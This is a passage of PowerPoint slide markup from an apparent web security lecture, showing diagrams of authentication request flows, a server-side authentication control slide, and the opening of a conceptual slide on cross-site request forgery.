          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Session IDs not stored in URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Line 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3DB2DFC-3C56-4045-9576-226EDCE503DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3189919" y="2962529"/>
            <a:ext cx="3505199" cy="9271"/>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40964" name="Line 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{770AF696-165A-4466-93ED-D992EFC3ADC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3206392" y="3138414"/>
            <a:ext cx="3505201" cy="296386"/>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40965" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAAA94A5-43EF-4C55-8318-3EF2D81A6CAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4330343" y="2664510"/>
            <a:ext cx="1428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Web access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40966" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C960F11C-C288-4C2E-91B8-634E3F19170C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="300914">
            <a:off x="3789995" y="3030326"/>
            <a:ext cx="3322384"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Web Form send authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.abc.com/123</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40968" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DEBB12B-F40C-4BE3-B5C6-DC4041DCCE7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2819400" y="5181600"/>
            <a:ext cx="5181600" cy="45720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40969" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5402FC2-625B-48E6-A06F-68396E5EB0A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-283399">
            <a:off x="3627803" y="5157765"/>
            <a:ext cx="20510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a:t>Web Request for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.abc.com/345</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40973" name="Line 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FDE0A2D-6BD0-4A7C-9AB1-BFDA9FDA079D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3206394" y="2901400"/>
            <a:ext cx="0" cy="37338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0975" name="Text Box 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F561E4E-C53F-41A7-86B5-3C87B9CF9B7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="247284">
            <a:off x="3700234" y="4391093"/>
            <a:ext cx="2762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Web Form for actual data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.abc.com/345</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40976" name="Line 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ABB1789-95DD-477D-B414-E11EC782648B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3206394" y="3892000"/>
            <a:ext cx="3505200" cy="22860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40977" name="Text Box 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1860648-4F72-4965-967F-FA576F4401CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-187019">
            <a:off x="3407366" y="3700478"/>
            <a:ext cx="24828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Web Reply w. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>authent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.abc.com/123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40978" name="AutoShape 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{367E8777-5FBD-4FC2-8367-0349A18451F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2717294" y="4350507"/>
            <a:ext cx="804231" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 48077"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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SzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>cache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40979" name="Line 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43621CE9-122B-4D72-9FE0-68FA25987641}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3282594" y="4577800"/>
            <a:ext cx="3428999" cy="24543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0980" name="Line 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EEF4120-B811-4D92-AE79-A6507F2ED634}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3275014" y="5882472"/>
            <a:ext cx="4705846" cy="21352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0981" name="Text Box 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD33C8E3-E2EB-4AB1-9053-FAA0484E9404}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="202503">
            <a:off x="5202127" y="5691032"/>
            <a:ext cx="2762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Web Form for actual data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.abc.com/345</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40982" name="Picture 24" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A15BA9C-A460-4F7F-B574-6B8B4E4AF10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81800" y="6858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83" name="Picture 25" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD177DC1-63B0-4771-82BC-6E62A7C9520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6858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B5DAE42D-C033-4EB8-92A4-110ECBBDAF99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2799260" y="1915839"/>
            <a:ext cx="1008113" cy="922667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6AF26A4-EBFE-4CFB-88AC-24FA32BBCF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7382067" y="1569856"/>
            <a:ext cx="1223171" cy="4602344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3F5758D-A0D3-4D2C-8284-3C457C9759F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6052540" y="1598063"/>
            <a:ext cx="1190866" cy="4920787"/>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F1565B0B-4BF1-445D-AE13-80FE5EA13221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="609600"/>
            <a:ext cx="8229600" cy="1219199"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Control:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Server-Side Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AC1C7B-BCB9-442C-B072-785ECDCD9021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Perform authentication and input validation on both client and server sides</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Use encryption &amp; hash between client &amp; server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="computr1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1096D208-D0CE-4131-8CE0-485A50BEFA64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2057400"/>
            <a:ext cx="1809750" cy="1809750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T1" fmla="*/ 0 h 21600"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T3" fmla="*/ 0 h 21600"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T5" fmla="*/ 0 h 21600"/>
              <a:gd name="T6" fmla="*/ 0 w 21600"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T8" fmla="*/ 0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2147483646 w 21600"/>
              <a:gd name="T21" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T22" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T23" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T24" fmla="*/ 0 w 21600"/>
              <a:gd name="T25" fmla="*/ 2147483646 h 21600"/>
              <a:gd name="T26" fmla="*/ 2147483646 w 21600"/>
              <a:gd name="T27" fmla="*/ 2147483646 h 216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4923 w 21600"/>
              <a:gd name="T43" fmla="*/ 2541 h 21600"/>
              <a:gd name="T44" fmla="*/ 16756 w 21600"/>
              <a:gd name="T45" fmla="*/ 11153 h 2160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9999FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15365" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61D31D8A-1D61-47CD-A00F-73E5CC8FA6AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="2590800"/>
            <a:ext cx="984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a:t>network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15366" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDCCF71A-B1CB-45D5-9A66-1FFBD20F139F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="28194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7" name="Line 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DA763EA-F601-4D55-AE27-126BA797D22F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="28194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15368" name="Picture 13" descr="BD18219_">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7090D3DC-760C-4FE9-A5F2-3B22210924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1905000"/>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9" name="Line 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E045CD9B-15BB-4182-ADAF-C3CC151C7176}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="3124200"/>
            <a:ext cx="411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0" name="Text Box 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6080D506-0BC4-42B1-8C64-44D293B5EB67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2193925" y="2398713"/>
            <a:ext cx="847725" cy="376237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF66"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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a:t>real -&gt;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83208FBB-065E-47B7-9532-A804D5A1BBD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494506" y="630566"/>
            <a:ext cx="8154988" cy="498475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Attack: Forgery</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Cross-Site-Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD2321F9-344D-4D34-B7F1-011C0AEFF4B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="2286000"/>
            <a:ext cx="4315181" cy="3557588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Server provides authentication token to user A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>User uses token for other purpose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Attacker copies and uses token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>: authentication token is pre-approved. Can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Deletes user account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Changes user data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
